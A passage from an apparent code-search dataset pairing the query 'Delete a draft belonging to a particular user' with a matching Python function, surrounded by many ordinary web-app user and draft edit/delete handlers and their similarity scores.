payload[\"first_name\"] = first_name\n if last_name:\n payload[\"last_name\"] = last_name\n if email:\n payload[\"email\"] = email\n if title:\n payload[\"title\"] = title\n if dept:\n payload[\"dept\"] = dept\n if notes:\n payload[\"notes\"] = notes\n if app_role:\n payload[\"user_type\"] = app_role\n if email_notification is not None:\n payload[\"subscribed_to_emails\"] = email_notification\n\n # Logic for setting admin status is slightly more complicated:\n if admin_role is None:\n pass\n elif admin_role == \"app_admin\":\n payload[\"admin\"] = True\n payload[\"roles\"] = \"\"\n elif admin_role == \"data_admin\":\n payload[\"admin\"] = False\n payload[\"roles\"] = \"data_admin\"\n else:\n payload[\"admin\"] = False\n payload[\"roles\"] = \"\"\n\n self.logger.debug(\"Sending the user information {0} to {1}\".format(json.dumps(payload), url))\n self.session.headers.update({\"Content-Type\": \"application/json\"}) # Set special header for this post\n response = self.session.put(url, data=json.dumps(payload), verify=False)\n self.logger.debug(\"Received response code {0} with reason {1}...\".format(response.status_code, response.reason))\n self.session.headers.pop(\"Content-Type\") # Remove header, as it affects other tests\n return response.json()['response']", "def update_drafts(self, issue, have_drafts=None):\n dirty = False\n if self._drafts is None:\n dirty = self._initialize_drafts()\n id = issue.key().id()\n if have_drafts is None:\n have_drafts = bool(issue.num_drafts) # Beware, this may do a query.\n if have_drafts:\n if id not in self._drafts:\n self._drafts.append(id)\n dirty = True\n else:\n if id in self._drafts:\n self._drafts.remove(id)\n dirty = True\n if dirty:\n self._save_drafts()", "def edit(self, instance_id, userdata=None, hostname=None, domain=None,\r\n notes=None):\r\n\r\n obj = {}\r\n if userdata:\r\n self.guest.setUserMetadata([userdata], id=instance_id)\r\n\r\n if hostname:\r\n obj['hostname'] = hostname\r\n\r\n if domain:\r\n obj['domain'] = domain\r\n\r\n if notes:\r\n obj['notes'] = notes\r\n\r\n if not obj:\r\n return True\r\n\r\n return self.guest.editObject(obj, id=instance_id)", "def edit_user(user_id):\n\n user = User.query.get_or_404(user_id)\n \n first = request.form['first_name']\n last = request.form['last_name']\n image = request.form['image_url']\n \n if not first or not last:\n flash(\"Please enter first and last name.\")\n return redirect(f\"/users/{user.id}/edit\")\n \n user.first_name = first\n user.last_name = last\n \n if image:\n user.image_url = image\n\n db.session.add(user)\n db.session.commit()\n\n return redirect(\"/users\")", "def update_user(context, params):\n\n user = User.objects.filter(id=params.get('id')).first()\n if not user:\n raise ValueError(\"user not found\")\n user.language = Language.objects.filter(id=params.get('language_id', None)).first()\n user.deputy = User.objects.filter(id=params.get('deputy_id', None)).first()\n # user.edited_by = context.user\n\n user.save()\n\n update_person(context, user, params)\n\n user.save()\n return user", "def _editSeed(self, request, seed):\n\n # if scope_path is present\n if 'scope_path' in seed.keys():\n # fill the to_user field with the scope path\n seed['to_user'] = seed['scope_path']", "def update_user(user_id):\n try:\n # Get the value which needs to be updated\n try:\n body = ast.literal_eval(json.dumps(request.get_json()))\n except:\n # Bad request as the request body is not available\n # Add message for debugging purpose\n return \"\", 400\n\n # Updating the user\n records_updated = collection.update_one({\"id\": int(user_id)}, body)\n\n # Check if resource is updated\n if records_updated.modified_count > 0:\n # Prepare the response as resource is updated successfully\n return \"\", 200\n else:\n # Bad request as the resource is not available to update\n # Add message for debugging purpose\n return \"\", 404\n except:\n # Error while trying to update the resource\n # Add message for debugging purpose\n return \"\", 500", "def put(self, user_id):\n\n user_data, error = user_schema.load(api.payload['data'])\n\n user = User.objects.get_or_404(public_id=user_id)\n user.update(updated_at=datetime.utcnow, **user_data)\n \n return user_schema.dump(user)", "def edit_post_process(post_id):\n\n # extract form data, commit, then redirect to /users\n f_title = request.form[\"post-title\"].strip()\n f_content = request.form[\"post-content\"].strip()\n\n # msg will also include a field for the user_id for routing.\n msg = db_edit_post(post_id, f_title, f_content)\n\n flash(msg[\"text\"], msg[\"severity\"])\n\n return redirect(f\"/users/{msg['user_id']}\")", "def edit(self):\n if not self.context.model.is_editable():\n raise Unauthorized(\"Editing is not allowed\")\n\n title = self.request.get('title')\n if not title:\n return JSONResponse(self.request).error(\n _('agenda_item_update_empty_string',\n default=u\"Agenda Item title must not be empty.\")).proceed().dump()\n\n title = title.decode('utf-8')\n if self.agenda_item.has_proposal:\n if len(title) > ISubmittedProposal['title'].max_length:\n return JSONResponse(self.request).error(\n _('agenda_item_update_too_long_title',\n default=u\"Agenda Item title is too long.\")\n ).proceed().dump()\n\n self.agenda_item.set_title(title)\n return JSONResponse(self.request).info(\n _('agenda_item_updated',\n default=u\"Agenda Item updated.\")).proceed().dump()", "def do_edit(self, args):\n member = None\n rowid = args.split(' ')[0]\n \n # loop till we get a rowid which matches a member in the database\n while True:\n rowid = self.validateRowid(rowid)\n if rowid is None:\n rowid = input('Enter member id: ')\n continue\n \n member = self.roster.get(rowid)\n if member is None:\n print(\"No member with id of %d\" % rowid)\n # rowid will get validated again, but it's the same value\n # which already passed validation\n continue\n \n break\n \n print('Editing %s %s' % (member.first, member.last))\n print('Type new value, hit enter to keep current value, or enter spaces to clear a value')\n member.first = self.getNewValue('First name', member.first)\n member.last = self.getNewValue('Last name', member.last)\n member.introducedDate = self.getNewValue('introduced date', member.introducedDate) \n \n self.roster.update(member)", "def update_user(user_id):\n new_dict = request.get_json(silent=True)\n if type(new_dict) is dict:\n user_obj = storage.get(\"User\", user_id)\n if user_obj is None:\n abort(404)\n for k, v in new_dict.items():\n if k not in [\"id\", \"email\", \"created_at\", \"updated_at\"]:\n setattr(user_obj, k, v)\n user_obj.save()\n return jsonify(user_obj.to_dict()), 200\n else:\n response = jsonify({\"error\": \"Not a JSON\"}), 400\n return response", "def podcast_edit(user_uid, podcast_id):\n parser_error = False\n user = get_authenticated_user()\n if user.uid != user_uid:\n raise Exception(\"Illegal access.\")\n\n if podcast_id is not None:\n podcast = Podcast.load(user.uid, podcast_id)\n else:\n podcast = None\n\n if request.method == \"POST\":\n url = request.form[\"url\"]\n podcast_type = request.form[\"podcast_type\"]\n\n if podcast is None:\n try:\n podcast = Podcast(user_uid=user.uid, podcast_type=podcast_type, url=url)\n podcast.initialize()\n except PodcastParserException as e:\n podcast = None # return to state prior to calling .initialize()\n parser_error = True\n else:\n podcast.save()\n return redirect(url_for(\"podcasts_list\"))\n else:\n try:\n podcast.url = url\n podcast.podcast_type = podcast_type\n podcast.initialize()\n except PodcastParserException as e:\n parser_error = True\n else:\n podcast.save()\n return redirect(url_for(\"podcasts_list\"))\n return render_template(\"podcast_edit.html\",\n podcast=podcast,\n podcast_types=PODCAST_TYPES,\n parser_error=parser_error)", "def update_item(self, xblock, user_id=None, allow_not_found=False, force=False):\r\n if xblock.location.category in DIRECT_ONLY_CATEGORIES:\r\n return super(DraftModuleStore, self).update_item(xblock, user_id, allow_not_found)\r\n\r\n draft_loc = as_draft(xblock.location)\r\n try:\r\n if not self.has_item(draft_loc):\r\n self.convert_to_draft(xblock.location)\r\n except ItemNotFoundError:\r\n if not allow_not_found:\r\n raise\r\n\r\n xblock.location = draft_loc\r\n super(DraftModuleStore, self).update_item(xblock, user_id, allow_not_found)\r\n # don't allow locations to truly represent themselves as draft outside of this file\r\n xblock.location = as_published(xblock.location)", "def _post_draft_message(request, draft):\n if draft is None:\n draft = models.Message(\n issue_key=request.issue.key, parent=request.issue.key,\n sender=request.user.email(), draft=True)\n draft.text = request.POST.get('reviewmsg')\n draft.put()\n return HttpTextResponse(draft.text)", "def update_user(user_id):\n update_usr = request.get_json()\n if not update_usr:\n abort(400, {'Not a JSON'})\n usr = storage.get(User, user_id)\n if not usr:\n abort(404)\n else:\n for key, value in update_usr.items():\n setattr(usr, key, value)\n storage.save()\n return jsonify(usr.to_dict())", "def modify_user(request, user_id):\n if request.method == 'POST':\n user = User.objects.get(id=user_id)\n form = ModifyUserForm(request.POST, instance=user)\n if form.is_valid():\n form.save()\n return redirect(index)\n else:\n user = User.objects.get(id=user_id)\n form = ModifyUserForm(instance=user)\n\n return render(request, 'users/modify_user.html', {\n 'form': form,\n 'user_id': user_id,\n })", "def edit_entry(id):\n if not session.get('logged_in'):\n abort(401)\n\n if request.method == 'POST':\n db = get_db()\n db.execute('update entries set title = ?, ingredients = ?, \\\n steps = ?, tags = ?, url = ? where id = ?',\n [request.form['title'], request.form['ingredients'],\n request.form['steps'], request.form['tags'],\n request.form['url'], request.form['id']])\n db.commit()\n flash('Entry ' + id + ' has been modified.', 'success')\n return view_entry(str(id))\n else:\n db = get_db()\n cur = db.execute('select id, title, ingredients, steps, tags, \\\n url from entries where id = ? order by id desc',\n [id.strip()])\n entries = cur.fetchall()\n return render_template('edit_entry.html', entries=entries)", "def restaurants_edit(restaurant_id):\n # If the user isn't logged in, send to the login page\n if helper.handle_login(login_session) is False:\n return redirect('/login')\n # Find the restaurant\n restaurant = session.query(Restaurant).filter_by(id=restaurant_id).one()\n if request.method == 'POST':\n # Only edit if the entry was re-written\n if len(request.form['address']) > 0:\n restaurant.address = request.form['address']\n if len(request.form['phone']) > 0:\n restaurant.phone = request.form['phone']\n if len(request.form['web']) > 0:\n restaurant.web = helper.check_restaurant_URL(request.form['web'])\n if len(request.form['tag_line']) > 0:\n tag_line = request.form['tag_line']\n tag_list = tag_line.split(',')\n helper.delete_restaurant_tag_pairs(restaurant.id)\n for tag in tag_list:\n helper.add_tag_if_not_exists(tag, restaurant.id)\n if len(request.form['description']) > 0:\n restaurant.description = request.form['description']\n\n restaurant.last_update = datetime.utcnow()\n\n session.add(restaurant)\n session.commit()\n flash(\"Restaurant {} edited!\".format(restaurant.name))\n return redirect(url_for('restaurants_page'))\n else:\n # Get user info if the user is signed in to render edit form\n user_info = helper.get_user_if_exists(login_session)\n tag_rest_list = session.query(RestaurantTags).filter_by(restaurant_id=restaurant.id).all()\n tag_line = ''\n # Create a tag line - by compiling the string tag_name for each tag\n for pair in tag_rest_list:\n tag = session.query(Tags).filter_by(id=pair.tag_id).first()\n tag_line += tag.tag_name + ', '\n return render_template('editrestaurant.html',\n restaurant=restaurant,\n tag_line=tag_line,\n user_info=user_info)", "def save_draft_entry(title, content, request, id=None):\n if \"drafts\" not in request.session:\n request.session[\"drafts\"] = []\n\n if id is None:\n id = uuid.uuid4()\n\n else:\n # we are deleting the old one as an alternative to \"replacing\".\n delete_draft_by_id(request, id)\n\n wiki = {\n \"id\": f\"{id}\",\n \"title\": title,\n \"body\": content\n }\n request.session['drafts'] += [wiki]" ]
[ "0.63595945", "0.6280873", "0.623346", "0.62005955", "0.618698", "0.61712956", "0.616757", "0.6136594", "0.6136562", "0.61018544", "0.60939956", "0.60843796", "0.5883826", "0.58486557", "0.5807267", "0.57433337", "0.5733624", "0.5710894", "0.56908655", "0.56681085", "0.5636532", "0.5623547", "0.5588345", "0.5549195", "0.55424416", "0.5525518", "0.55219877", "0.5499191", "0.5493994", "0.54774994", "0.54753023", "0.5473692", "0.54623336", "0.54356134", "0.5401796", "0.53818357", "0.53565025", "0.53162456", "0.52937883", "0.5291551", "0.5285512", "0.5276801", "0.52740717", "0.5269071", "0.5241892", "0.52390003", "0.52205914", "0.5219559", "0.52192074", "0.52112454", "0.52081895", "0.52031314", "0.5202069", "0.5198901", "0.5197227", "0.51937515", "0.51841545", "0.5183425", "0.51826", "0.51789266", "0.51730865", "0.51690656", "0.51637363", "0.5158566", "0.5152604", "0.51514316", "0.5143821", "0.5130277", "0.5123523", "0.51172864", "0.51038504", "0.5090491", "0.508894", "0.5084592", "0.50827426", "0.5079641", "0.5077554", "0.5068214", "0.5065948", "0.5062085", "0.506061", "0.50534743", "0.5046808", "0.5042253", "0.504168", "0.50363636", "0.5032691", "0.5030787", "0.502486", "0.5023102", "0.5012522", "0.50111216", "0.5006359", "0.50062984", "0.50055736", "0.50055534", "0.50046563", "0.5002317", "0.49955454", "0.49919808" ]
0.7761259
0
Delete a draft belonging to a particular user.
def do_delete_draft(draft_id: int, user_profile: UserProfile) -> None: try: draft_object = Draft.objects.get(id=draft_id, user_profile=user_profile) except Draft.DoesNotExist: raise ResourceNotFoundError(_("Draft does not exist")) draft_id = draft_object.id draft_object.delete() event = {"type": "drafts", "op": "remove", "draft_id": draft_id} send_event(user_profile.realm, event, [user_profile.id])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def delete_draft(draft_uuid):\n api_request('delete', api_url('drafts', str(draft_uuid)))", "def delete(self,\n draft_id,\n ):\n return self._invoke('delete',\n {\n 'draft_id': draft_id,\n })", "def delete(self, user_id):\r\n return delete_user(request, user_id)", "def delete(self, user_id):\n return delete_user(user_id)", "def _delete_draft_message(draft):\n if draft is not None:\n draft.key.delete()\n return HttpTextResponse('OK')", "def delete_user(self, user):\n self.delete(user)", "def delete(self, user: 'UserCondensed'):\n self._delete(entity=user)", "def delete_drafts(request):\n query = models.Comment.query(\n models.Comment.author == request.user, models.Comment.draft == True,\n ancestor=request.issue.key)\n keys = query.fetch(keys_only=True)\n ndb.delete_multi(keys)\n request.issue.calculate_draft_count_by_user()\n request.issue.put()\n return HttpResponseRedirect(\n reverse(publish, args=[request.issue.key.id()]))", "def delete(user_id):\n assert isinstance(user_id, ObjectId)\n\n User.objects(id=user_id).delete()", "def delete_user(self, user):\n # noinspection PyUnresolvedReferences\n self.delete(user)", "def delete(user_id):\n # Get the user requested\n user = User.query.filter(User.user_id == user_id).one_or_none()\n\n if user is not None:\n db.session.delete(user)\n db.session.commit()\n return (\n \"User {user_id} deleted\".format(user_id=user_id), 200\n )\n\n else:\n abort(\n 404,\n \"Person not found for Id: {user_id}\".format(user_id=user_id),\n )", "def delete(self, user_id):\n\n user = User.objects.get_or_404(public_id=user_id)\n return user.delete()", "def delete(user_id: int):\n usr = get_by_id(user_id)\n if not usr:\n raise UserNotFound\n\n db.session.delete(usr)\n db.session.commit()", "def delete_user(self, user):\n self.execute(TABELLE['id_users'][\"delete\"], user[\"id\"])", "def delete_user():", "def delete_user(self, user_id):\n\n # ask the model to delete the user\n um = User(self.settings)\n status = um.delete(user_id)\n\n # return\n return status", "def DeleteDraft(host, change):\n path = _GetChangePath(change)\n try:\n FetchUrl(host, path, reqtype='DELETE', ignore_204=True, ignore_404=False)\n except GOBError as e:\n # On success, gerrit returns status 204; anything else is an error.\n if e.http_status != 204:\n raise\n else:\n raise GOBError(\n 200, 'Unexpectedly received a 200 http status while deleting draft %r'\n % change)", "def delete_user(self, user_id):\n sql = 'update account_user set is_deleted = 1 where id = %s'\n with connection.cursor() as cursor:\n cursor.execute(sql, [user_id])\n row = cursor.fetchone()\n\n return row", "def delete_item(self, id: str, user: User) -> bool:", "def delete_user():\n #TODO user delete\n pass", "def delete_user(self, user_name):\n user = self.get_user(user_name)\n return self.client.delete_resource(user.get('href'))", "def delete(self, user_id):\n user = User.query.get(user_id)\n \n if user is None:\n return abort(422, message=\"User does not exist\")\n \n # check if the user is an admin and is the only one\n admins = User.query.filter_by(admin=True).all()\n if user.id == get_jwt_identity() and len(admins) == 1:\n return abort(422, message=\"User is the only admin, there must be at least one admin in the system\")\n \n user.delete()\n \n return { 'message': \"User '{}' has been deleted\".format(user.id) }", "def delete_user(user_id):\n\n user = User.query.get(user_id)\n db.session.delete(user)\n db.session.commit()\n return", "def deleteUser(user):\n delete_user(user)\n return redirect(url_for('login'))", "async def delete_user(user_id):\n \n user = User.select().where(User.id == user_id).first()\n\n if not user:\n return HTTPException(404, 'User not found')\n else:\n user.delete_instance()\n\n return f\"User {user.username} deleted successfully\"", "def delete_state(self, user=None):\r\n if user:\r\n self.q(css='input[id^=sd_fu_]').fill(user)\r\n self.q(css='section.staff-modal a#staff-debug-sdelete').click()", "def get_delete(self, user_id):\n return self.post_delete(user_id)", "def delete(self, user_id):\n user = User.query.get(user_id)\n\n if user is None:\n return mk_response(\"User does not exist\", 422)\n\n # check if the user is an admin and is the only one\n admins = User.query.filter_by(admin=True).all()\n if user.id == get_jwt_identity() and len(admins) == 1:\n return mk_response(\"User is the only admin, there must \" +\n \"be at least one admin in the system\", 422)\n\n user.delete()\n\n return mk_response(\"User '{}' has been deleted\".format(user.id))", "def delete(self, request, user_id=None):\n data = json.loads(request.body.decode())\n authenticated = Account.check_credentials(request, data['email'], data['password'])\n user = {}\n user['account_id'] = authenticated.id\n\n if authenticated.check_admin(request, user):\n NLTKOutput.remove(request=request, pk=user_id)\n Account.remove(request=request, pk=user_id)\n return Response(json='Account and content deleted', status=204)\n\n return Response(json='Not Authorized', status=401)", "def delete_user(self, user_id):\n if self.database is None:\n raise Exception(\"No database.\")\n if user_id is None or len(user_id) == 0:\n raise Exception(\"Bad parameter.\")\n return self.database.delete_user(user_id)", "def delete_user(id):\n pass", "def delete(self, request, *args, **kwargs):\n thread = self.get_thread()\n if not thread:\n raise NotFound(code=status.HTTP_404_NOT_FOUND)\n\n thread.userthread_set.filter(user=request.user).update(deleted=True)\n return Response(status=status.HTTP_200_OK)", "def delete_user(user_id):\n user = User.query.get_or_404(user_id)\n db.session.delete(user)\n db.session.commit()\n\n return redirect('/')", "def remove(self, user):\r\n url = '{0}/{1}'.format(self.get_url(), user)\r\n\r\n return http.Request('DELETE', url), parsers.parse_empty", "def userproject_post_delete(sender, instance, **kwargs):\n instance.document.delete(False)", "def delete_user(payload, user_id):\n user = User.query.get(user_id)\n # exception for non existing id\n if user is None:\n abort(404)\n # set error status\n error = False\n # delete the user\n try:\n user.delete()\n except Exception:\n user.rollback()\n error = True\n print(sys.exc_info())\n finally:\n user.close_session()\n\n if error:\n abort(422)\n\n return jsonify({\n 'success': True,\n 'deleted': user_id\n })", "def delete_user(self, user_id):\n return self._delete('/users/{0}'.format(user_id))", "def delete(self, *args, **kwargs):\n if 'user' not in kwargs or not args:\n self.raise401()\n\n user = kwargs['user']\n path = parse_path(args[0])\n project = Project.objects(name=path[0], members__in=[user])\n if not project:\n self.raise401()\n try:\n project.delete()\n self.set_status(204)\n self.finish()\n except Exception as e:\n reason = e.message\n self.raise400(reason=reason)", "def delete_user(user_id):\n usr = storage.get(User, user_id)\n if usr:\n usr.delete(), storage.save()\n return {}\n else:\n abort(404)", "def delete(user: User) -> None:\n anonym_uid = DBDiscussionSession.query(User).filter_by(nickname=nick_of_anonymous_user).first().uid\n\n # authors\n authors = DBDiscussionSession.query(Issue).filter_by(author_uid=user.uid).all()\n authors += DBDiscussionSession.query(TextVersion).filter_by(author_uid=user.uid).all()\n authors += DBDiscussionSession.query(PremiseGroup).filter_by(author_uid=user.uid).all()\n authors += DBDiscussionSession.query(Premise).filter_by(author_uid=user.uid).all()\n authors += DBDiscussionSession.query(Argument).filter_by(author_uid=user.uid).all()\n authors += DBDiscussionSession.query(ReviewCanceled).filter_by(author_uid=user.uid).all()\n authors += DBDiscussionSession.query(RevokedContent).filter_by(author_uid=user.uid).all()\n for element in authors:\n element.author_uid = anonym_uid\n\n # reviews without ReviewSplitValues and ReviewMergeValues\n review_edit = DBDiscussionSession.query(ReviewEdit).filter_by(detector_uid=user.uid).all()\n review_edit_value = DBDiscussionSession.query(ReviewEditValue).filter(\n ReviewEditValue.review_edit_uid.in_([r.uid for r in review_edit])).all()\n reviews = DBDiscussionSession.query(ReviewDelete).filter_by(detector_uid=user.uid).all()\n reviews += DBDiscussionSession.query(ReviewOptimization).filter_by(detector_uid=user.uid).all()\n reviews += DBDiscussionSession.query(ReviewDuplicate).filter_by(detector_uid=user.uid).all()\n reviews += DBDiscussionSession.query(ReviewMerge).filter_by(detector_uid=user.uid).all()\n reviews += DBDiscussionSession.query(ReviewSplit).filter_by(detector_uid=user.uid).all()\n for element in reviews + review_edit + review_edit_value:\n element.detector_uid = anonym_uid\n\n # last reviewed elements\n last_reviewers = DBDiscussionSession.query(LastReviewerDelete).filter_by(reviewer_uid=user.uid).all()\n last_reviewers += DBDiscussionSession.query(LastReviewerDuplicate).filter_by(reviewer_uid=user.uid).all()\n last_reviewers += DBDiscussionSession.query(LastReviewerEdit).filter_by(reviewer_uid=user.uid).all()\n last_reviewers += DBDiscussionSession.query(LastReviewerOptimization).filter_by(reviewer_uid=user.uid).all()\n last_reviewers += DBDiscussionSession.query(LastReviewerSplit).filter_by(reviewer_uid=user.uid).all()\n last_reviewers += DBDiscussionSession.query(LastReviewerMerge).filter_by(reviewer_uid=user.uid).all()\n for element in last_reviewers:\n element.reviewer_uid = anonym_uid\n\n # revoked content\n rev_cntnt_hisy_old = DBDiscussionSession.query(RevokedContentHistory).filter_by(old_author_uid=user.uid).all()\n rev_cntnt_hisy_new = DBDiscussionSession.query(RevokedContentHistory).filter_by(new_author_uid=user.uid).all()\n for element in rev_cntnt_hisy_old:\n element.old_author_uid = anonym_uid\n for element in rev_cntnt_hisy_new:\n element.new_author_uid = anonym_uid\n\n DBDiscussionSession.query(ReputationHistory).filter_by(user=user).delete()\n DBDiscussionSession.query(SeenStatement).filter_by(user=user).delete()\n DBDiscussionSession.query(SeenArgument).filter_by(user_uid=user.uid).delete()\n DBDiscussionSession.query(History).filter_by(author_uid=user.uid).delete()\n DBDiscussionSession.query(Settings).filter_by(user=user).delete()\n DBDiscussionSession.query(StatementReference).filter_by(author=user).delete()\n DBDiscussionSession.query(ClickedArgument).filter_by(author_uid=user.uid).delete()\n DBDiscussionSession.query(ClickedStatement).filter_by(author_uid=user.uid).delete()\n DBDiscussionSession.query(MarkedArgument).filter_by(author_uid=user.uid).delete()\n DBDiscussionSession.query(MarkedStatement).filter_by(author_uid=user.uid).delete()\n DBDiscussionSession.query(Message).filter_by(from_author_uid=user.uid).delete()\n DBDiscussionSession.query(Message).filter_by(to_author_uid=user.uid).delete()\n DBDiscussionSession.query(User).filter_by(uid=user.uid).delete()", "def can_delete(self, user):\n raise Return(False)", "def delete_user_process(user_id):\n\n db_user = User.query.get_or_404(user_id)\n\n db.session.delete(db_user)\n db.session.commit()\n\n return redirect(\"/users\")", "def delete_user(self, user):\n try:\n with dbm.open(self.dbm_path, 'c', 0o600) as db:\n del db[user.name]\n except KeyError as k:\n pass", "def test_delete(self):\n thread = self.create_thread()\n ut = UserThread.objects.get(\n user=thread.recipients.first(), thread=thread)\n ut_id = ut.pk\n ut.delete()\n ut = UserThread.objects.with_deleted().get(pk=ut_id)\n self.assertEqual(ut.status, 'deleted')", "def delete_user(user_id):\n\n user = User.query.get_or_404(user_id)\n db.session.delete(user)\n db.session.commit()\n\n return redirect(\"/users\")", "def delete_user(self, user):\n name = utils.get_name(user)\n self._user_manager.delete(name)", "def delete_post(user_id, post_id):\n\n post = Post.query.get_or_404(post_id)\n\n db.session.delete(post)\n db.session.commit()\n\n return redirect(f'/users/{user_id}')", "def delete_user(self, user):\n # type: (dict) -> dict\n self.request_url = \"{0}/{1}/{2}\".format(self.API_URL, self.USER_ENDPOINT, user['id'])\n return self.__create_request(payload=user, request_type=self.REQUEST_DELETE, version=\"v1\")", "def delete_user(user_id):\n user = User.query.get_or_404(user_id)\n db.session.delete(user)\n db.session.commit()\n\n return redirect(\"/users\")", "def delete_hotdesk(self, account_id, user_id):\n return self.rest_request.delete('accounts/' + str(account_id) +\n '/users/' + str(user_id) + '/hotdesks')", "def remove(self, user_id):\n pass", "def desvinculacionComite(request,pk,pk_user):\n instanceUser = Comite.objects.filter(id_proyecto = pk, id_user = pk_user)\n instanceUser.delete()", "def delete_user(self, _id):\n return self.make_request(\"DELETE\", \"users/\"+_id, {})", "def user_id_delete(user_id):\n user = storage.get(\"User\", user_id)\n\n if user is None:\n abort(404)\n user.delete()\n del user\n return make_response(jsonify({}), 200)", "def delete_user(user_id):\n netAdminToolDB = app.config['DATABASE']\n user = netAdminToolDB.get_user(user_id)\n\n if user == None:\n return jsonify({'error': 'User_id not found'}), 404\n\n netAdminToolDB.delete_user(user_id)\n return jsonify({'result': True})", "def delete_user(self, userId):\n\n try:\n query = \"delete from user where userId = {}\".format(userId)\n print(query)\n cur = self.con.cursor()\n cur.execute(query)\n self.con.commit()\n\n logger.info(\"Deleted\")\n except Exception as e:\n logger.error(\"Error occured at data deletion..\", e)", "def delete(self):\n\n user_id = get_jwt_identity()\n user = user_crud.get(user_id)\n if not user:\n abort(404, message=\"User not Found\")\n all_tokens = auth_crud.get_user_tokens(user_id)\n tokens = [token.to_dict() for token in all_tokens]\n for token in tokens:\n auth_crud.revoke_token(token['id'], user_id)\n user = user_crud.remove(user_id)\n\n return {'msg': 'User Removed'}", "def remove_draft(self, account, uuid):\n account = Account(account, hive_instance=self.hive)\n return self._conveyor_method(account, None,\n \"conveyor.remove_draft\",\n [account['name'], uuid])", "def delete(self, user):\n q = \"DELETE FROM profiles WHERE user=?\"\n try:\n self._query(q, (user,), fetch='none')\n except Exception as e:\n raise e", "def _delete_user(self, user):\n if User.delete_user(user):\n self.session.output({'deleted': 'user {} and their related accounts'.format(user)})\n return True\n else:\n self.session.output({'invalid_user': 'please enter valid user ID!\\n'}, '[ Fail to delete user ]')\n return False", "def delete(self):\n return self._router_request(\n self._make_request_data(\n 'deleteUserCommand',\n data=dict(\n uid=self.parent,\n id=self.id\n )\n )\n )", "def _delete(self, pk, user=None):\n request = self.factory.delete(self.detail_url(pk), format='json')\n force_authenticate(request, user)\n resp = self.detail_view(request, pk=pk)\n resp.render()\n return resp", "def delete(self,user_id):\n user_status,calling_user = has_admin_privileges()\n if user_status == \"no_auth_token\":\n return (bad_request,400,headers)\n\n if user_status == \"not_logged_in\":\n return (unauthorized,401,headers)\n\n # getting the user. Assuming the user exists. Case of user not existing is checked below\n try:\n user = g.session.query(g.Base.classes.users).get(user_id)\n except Exception as err:\n print(type(err))\n print(err)\n return (internal_server_error,500,headers)\n\n # *Only Directors, Organizers and user calling the request\n if user:\n try:\n if user_status in [\"director\",\"organizer\"] or calling_user.id == user.id:\n if user.rsvps_collection:\n g.session.delete(g.session.query(g.Base.classes.rsvps).get(user.rsvps_collection[0].id))\n if user.applications_collection:\n g.session.delete(g.session.query(g.Base.classes.applications).get(user.applications_collection[0].id))\n g.session.delete(g.session.query(g.Base.classes.users).get(user_id))\n else:\n forbidden[\"error_list\"]={\"Authorization error\":\"You do not privileges to access this resource. Contact one of the organizers if you think require access.\"}\n return (forbidden,403,headers)\n except Exception as err:\n print(type(err))\n print(err)\n return (internal_server_error, 500, headers)\n else:\n return (not_found,404,headers)\n\n # error handling for mail send\n try:\n f = open(\"common/account_creation.html\",'r')\n body = Template(f.read())\n f.close()\n body = body.render(first_name = user.first_name)\n send_email(subject = \"Account creation confirmation!\",recipient = user.email, body = \"Account deleted!\")\n return (\"\",204,headers)\n except Exception as err:\n print(type(err))\n print(err)\n internal_server_error[\"error_list\"][\"error\"] = \"Account successfully created. Error in confirmation email sending.\"\n return (internal_server_error,500,headers)", "def remove_admin(self, project_id, user_id):\n current_user = request.environ.get('repoze.who.identity')['user']\n user = controller_globals._get_user_from_email(current_user.email)\n\n # make sure we're actually the project lead\n if not self._current_user_leads_review(project_id):\n return \"<font color='red'>tsk, tsk. you're not the project lead, %s.</font>\" % user.fullname\n\n leader_to_remove = Session.query(model.User).filter_by(id=user_id).one()\n review = self._get_review_from_id(project_id)\n review.leaders.remove(leader_to_remove)\n Session.add(review)\n Session.commit()\n\n redirect(url(controller=\"review\", action=\"admin\", project_id=project_id))", "def apply_deletion_policy(cls, user_id: str) -> None:\n keys = cls.query(datastore_services.any_of(\n cls.recipient_id == user_id,\n cls.sender_id == user_id,\n )).fetch(keys_only=True)\n datastore_services.delete_multi(keys)", "def team_user_delete(token_user, team_id, user_id):\n team = Team.query.get(team_id)\n if team is None:\n abort(404, 'team not found')\n\n if len(team.members) == 1:\n abort(400, 'only one member on team -- use team delete instead')\n\n # check for permissions to delete the team\n if not (token_user.has_permission('team.update.elevated') or\n (token_user.has_permission('team.update') and\n team.has_member(token_user))):\n abort(403, 'insufficient permissions to delete user from team')\n\n user = User.query.get(user_id)\n if user is None:\n abort(400, 'invalid user id')\n\n user.teams.remove(team)\n get_db().commit()\n\n return '', 204", "def delete_user(self) -> 'outputs.ActingUserResponse':\n return pulumi.get(self, \"delete_user\")", "def delete_item(self, item_id, user_id):\r\n item = self._db_manager.get_item(item_id)\r\n if item is None:\r\n flash(\"Invalid item.\")\r\n return\r\n if item[\"user_id\"] != user_id:\r\n flash(\"Only the original creator can delete an item.\")\r\n return\r\n flash(self._db_manager.delete_item(item_id))", "def delete_user(self):\n\n User.user_list.remove(self)", "def delete_user(self):\n User.user_list.remove(self)", "def delete_user(self):\n User.user_list.remove(self)", "def delete_user(self):\n User.user_list.remove(self)", "def delete_user(user_id):\n temp = models.storage.get('User', user_id)\n if temp is None:\n abort(404)\n temp.delete()\n models.storage.save()\n return jsonify({})", "def user_delete(user_id):\n user = storage.get('User', user_id)\n if user is None:\n abort(404)\n user.delete()\n storage.save()\n return jsonify({}), 200", "def delete(self, user):\r\n if user.is_authenticated() and self.author == user:\r\n post = self.post\r\n super(Comment, self).delete()\r\n cache_bust([('comments', post.pk)])\r\n return post\r\n return False", "def delete_user_entitlement(self, user_id):\n route_values = {}\n if user_id is not None:\n route_values['userId'] = self._serialize.url('user_id', user_id, 'str')\n self._send(http_method='DELETE',\n location_id='8480c6eb-ce60-47e9-88df-eca3c801638b',\n version='6.0-preview.3',\n route_values=route_values)", "def user_delete(user_id=None):\n obj = storage.get(\"User\", user_id)\n if obj is None:\n abort(404)\n storage.delete(obj)\n storage.save()\n return jsonify({}), 200", "def delete_user(id_user: int):\n mycursor.execute(f\"\"\"DELETE FROM User\n WHERE id_user = {id_user}\"\"\")\n mydb.commit()\n return f\"L'utilisateur {id_user} a été supprimé\"", "def delete_user(user_id=None):\n obj = storage.get('User', user_id)\n if obj is None:\n abort(404)\n else:\n storage.delete(obj)\n storage.save()\n return jsonify({}), 200", "def delete(self, user):\r\n if user.is_authenticated() and self.author == user:\r\n if self._handle_removed_media():\r\n Timeline.objects.remove_from_timeline(instance=self, 